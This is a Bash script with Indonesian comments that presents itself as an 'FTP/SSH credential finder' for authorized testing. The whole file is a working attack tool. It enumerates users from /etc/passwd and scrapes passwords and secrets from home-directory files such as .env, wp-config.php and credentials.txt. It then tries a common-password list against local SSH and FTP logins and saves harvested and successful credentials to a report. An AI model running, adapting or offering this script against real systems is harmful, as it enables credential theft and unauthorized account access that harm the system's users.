#!/bin/bash # FTP/SSH CREDENTIAL FINDER # Mencari username dan password FTP/SSH di sistem # FOR EDUCATIONAL/AUTHORIZED SECURITY TESTING ONLY # Warna untuk output RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m' PURPLE='\033[0;35m' CYAN='\033[0;36m' NC='\033[0m' # Konfigurasi OUTPUT_FILE="found_credentials_$(date +%F_%H%M%S).txt" COMMON_PASSWORDS=("password" "123456" "12345678" "qwerty" "abc123" "letmein" "admin" "welcome" "password123" "root" "toor" "user" "test") PASSWORD_FILES=(".password" ".passwd" "password.txt" "passwd.txt" "credentials.txt" "secret.txt" ".secret" "config.php" "wp-config.php" ".env") CONFIG_PATTERNS=("DB_PASSWORD" "FTP_USER" "FTP_PASS" "SSH_USER" "SSH_PASS" "password" "pass" "secret") # Fungsi untuk menampilkan banner show_banner() { echo -e "${PURPLE}" cat << "EOF" ╔══════════════════════════════════════════════════════════╗ ║ FTP/SSH CREDENTIAL FINDER ║ ║ Find FTP/SSH usernames and passwords in the system ║ ║ FOR AUTHORIZED TESTING ONLY ║ ╚══════════════════════════════════════════════════════════╝ EOF echo -e "${NC}" } # Fungsi untuk mendapatkan semua user reguler get_all_users() { echo -e "${CYAN}[*] Mendapatkan semua user reguler...${NC}" # Filter user reguler (UID >= 1000 dan bukan nobody) awk -F: '$3 >= 1000 && $1 != "nobody" {print $1}' /etc/passwd | sort > /tmp/all_users.txt # Tambahkan user dengan UID antara 500-999 (untuk beberapa sistem) awk -F: '$3 >= 500 && $3 < 1000 && $1 != "nfsnobody" {print $1}' /etc/passwd | sort >> /tmp/all_users.txt # Hapus duplikat sort -u /tmp/all_users.txt -o /tmp/all_users.txt USER_COUNT=$(wc -l < /tmp/all_users.txt) echo -e "${GREEN}[+] Ditemukan $USER_COUNT user reguler${NC}" # Tampilkan user yang akan diproses echo -e "${BLUE}[*] User yang akan diproses:${NC}" cat /tmp/all_users.txt | nl -bn } # Fungsi untuk mencari password di file find_password_files() { local username=$1 local home_dir="/home/$username" local found_passwords=() echo -e "${CYAN}[*] Mencari file password di $home_dir...${NC}" # Cek apakah home directory ada if [ ! -d "$home_dir" ]; then echo -e "${RED}[-] Home directory tidak ditemukan${NC}" return fi # Cari file password umum for pattern in "${PASSWORD_FILES[@]}"; do if [ -f "$home_dir/$pattern" ]; then echo -e "${GREEN}[+] Ditemukan file: $home_dir/$pattern${NC}" # Ekstrak password dari file while IFS= read -r line; do # Cari pola password if [[ $line =~ [Pp]assword[[:space:]]*[:=][[:space:]]*([^[:space:]]+) ]]; then password="${BASH_REMATCH[1]}" found_passwords+=("$password") echo -e "${YELLOW}[+] Password ditemukan: $password${NC}" elif [[ $line =~ ([^[:space:]]+) ]]; then # Ambil kata pertama sebagai kandidat password candidate="${BASH_REMATCH[1]}" if [ ${#candidate} -ge 6 ]; then found_passwords+=("$candidate") echo -e "${YELLOW}[+] Kandidat password: $candidate${NC}" fi fi done < "$home_dir/$pattern" fi done # Cari di file konfigurasi find "$home_dir" -type f \( -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.php" -o -name "*.env" \) 2>/dev/null | while read -r file; do echo -e "${YELLOW}[*] Memeriksa: $file${NC}" for pattern in "${CONFIG_PATTERNS[@]}"; do if grep -qi "$pattern" "$file" 2>/dev/null; then echo -e "${GREEN}[+] Ditemukan pola konfigurasi di: $file${NC}" # Ekstrak nilai grep -i "$pattern" "$file" | while IFS= read -r line; do if [[ $line =~ [\"']([^\"']+)[\"'] ]] || [[ $line =~ [[:space:]]*=[[:space:]]*([^[:space:]]+) ]]; then value="${BASH_REMATCH[1]}" if [ ${#value} -ge 4 ]; then found_passwords+=("$value") echo -e "${YELLOW}[+] Nilai potensial: $value${NC}" fi fi done fi done done # Simpan password yang ditemukan for pass in "${found_passwords[@]}"; do echo "$username:$pass" >> /tmp/found_passwords.txt done } # Fungsi untuk mencoba login SSH try_ssh_login() { local username=$1 local password=$2 local ip_address=$(hostname -I | awk '{print $1}') echo -e "${CYAN}[*] Mencoba SSH login untuk $username...${NC}" # Cek apakah SSH tersedia if ! systemctl is-active --quiet sshd && ! systemctl is-active --quiet ssh; then echo -e "${RED}[-] SSH tidak aktif${NC}" return 1 fi # Gunakan sshpass jika tersedia if command -v sshpass >/dev/null 2>&1; then if sshpass -p "$password" ssh -o ConnectTimeout=5 -o BatchMode=yes -o StrictHostKeyChecking=no "$username@$ip_address" "exit" 2>/dev/null; then echo -e "${GREEN}[+] SSH BERHASIL: $username:$password${NC}" echo "SSH_SUCCESS:$username:$password" >> /tmp/success_logins.txt return 0 else echo -e "${RED}[-] SSH gagal untuk $username:$password${NC}" return 1 fi else echo -e "${YELLOW}[?] sshpass tidak tersedia, coba manual:${NC}" echo -e "${BLUE}ssh $username@$ip_address${NC}" echo -e "${BLUE}Password: $password${NC}" return 1 fi } # Fungsi untuk mencoba login FTP try_ftp_login() { local username=$1 local password=$2 local ip_address=$(hostname -I | awk '{print $1}') echo -e "${CYAN}[*] Mencoba FTP login untuk $username...${NC}" # Cek apakah FTP tersedia if ! systemctl is-active --quiet vsftpd && ! systemctl is-active --quiet proftpd && ! systemctl is-active --quiet pure-ftpd; then echo -e "${RED}[-] FTP tidak aktif${NC}" return 1 fi # Gunakan ftp jika tersedia if command -v ftp >/dev/null 2>&1; then { echo "open $ip_address" echo "user $username $password" echo "ls" echo "bye" } | ftp -n > /tmp/ftp_test_$$ 2>&1 if grep -q "Login successful\|230 Login" /tmp/ftp_test_$$; then echo -e "${GREEN}[+] FTP BERHASIL: $username:$password${NC}" echo "FTP_SUCCESS:$username:$password" >> /tmp/success_logins.txt rm -f /tmp/ftp_test_$$ return 0 else echo -e "${RED}[-] FTP gagal untuk $username:$password${NC}" rm -f /tmp/ftp_test_$$ return 1 fi else echo -e "${YELLOW}[?] ftp tidak tersedia, coba manual:${NC}" echo -e "${BLUE}ftp $ip_address${NC}" echo -e "${BLUE}Username: $username${NC}" echo -e "${BLUE}Password: $password${NC}" return 1 fi } # Fungsi untuk mencoba password umum try_common_passwords() { local username=$1 echo -e "${CYAN}[*] Mencoba password umum untuk $username...${NC}" for password in "${COMMON_PASSWORDS[@]}"; do echo -e "${YELLOW}[*] Mencoba: $username:$password${NC}" # Coba SSH try_ssh_login "$username" "$password" # Coba FTP try_ftp_login "$username" "$password" # Jika salah satu berhasil, lanjut ke user berikutnya if grep -q "SUCCESS:$username:" /tmp/success_logins.txt 2>/dev/null; then break fi done } # Fungsi untuk membuat laporan generate_report() { echo -e "${CYAN}[*] Membuat laporan...${NC}" echo "FTP/SSH CREDENTIAL FINDER REPORT" > "$OUTPUT_FILE" echo "Date: $(date)" >> "$OUTPUT_FILE" echo "Hostname: $(hostname)" >> "$OUTPUT_FILE" echo "IP Address: $(hostname -I | awk '{print $1}')" >> "$OUTPUT_FILE" echo "========================================" >> "$OUTPUT_FILE" echo "" >> "$OUTPUT_FILE" # Tambahkan user yang ditemukan echo "USERS FOUND:" >> "$OUTPUT_FILE" cat /tmp/all_users.txt >> "$OUTPUT_FILE" echo "" >> "$OUTPUT_FILE" # Tambahkan password yang ditemukan if [ -f /tmp/found_passwords.txt ]; then echo "PASSWORDS FOUND IN FILES:" >> "$OUTPUT_FILE" cat /tmp/found_passwords.txt >> "$OUTPUT_FILE" echo "" >> "$OUTPUT_FILE" fi # Tambahkan login yang berhasil if [ -f /tmp/success_logins.txt ]; then echo "SUCCESSFUL LOGINS:" >> "$OUTPUT_FILE" cat /tmp/success_logins.txt >> "$OUTPUT_FILE" echo "" >> "$OUTPUT_FILE" fi echo -e "${GREEN}[+] Laporan disimpan: $OUTPUT_FILE${NC}" } # Fungsi utama main() { show_banner # Inisialisasi file output > /tmp/found_passwords.txt > /tmp/success_logins.txt get_all_users echo -e "\n${PURPLE}========================================${NC}" echo -e "${PURPLE} MEMULAI PENCARIAN KREDENSIAL ${NC}" echo -e "${PURPLE}========================================${NC}" # Proses setiap user while IFS= read -r username; do echo -e "\n${PURPLE}[*] Memproses user: $username${NC}" echo -e "${BLUE}========================================${NC}" # Cek apakah user memiliki home directory if [ ! -d "/home/$username" ]; then echo -e "${RED}[-] User $username tidak memiliki home directory${NC}" continue fi # Cari file password find_password_files "$username" # Coba password umum try_common_passwords "$username" echo -e "${BLUE}========================================${NC}" done < /tmp/all_users.txt # Buat laporan generate_report # Bersihkan rm -f /tmp/all_users.txt echo -e "\n${GREEN}[+] Pencarian selesai!${NC}" echo -e "${YELLOW}[!] Lihat laporan: $OUTPUT_FILE${NC}" echo -e "${RED}[!!!] GUNAKAN HASIL DENGAN HATI-HATI DAN HANYA UNTUK TUJUAN YANG SAH!${NC}" } # Jalankan program main "$@"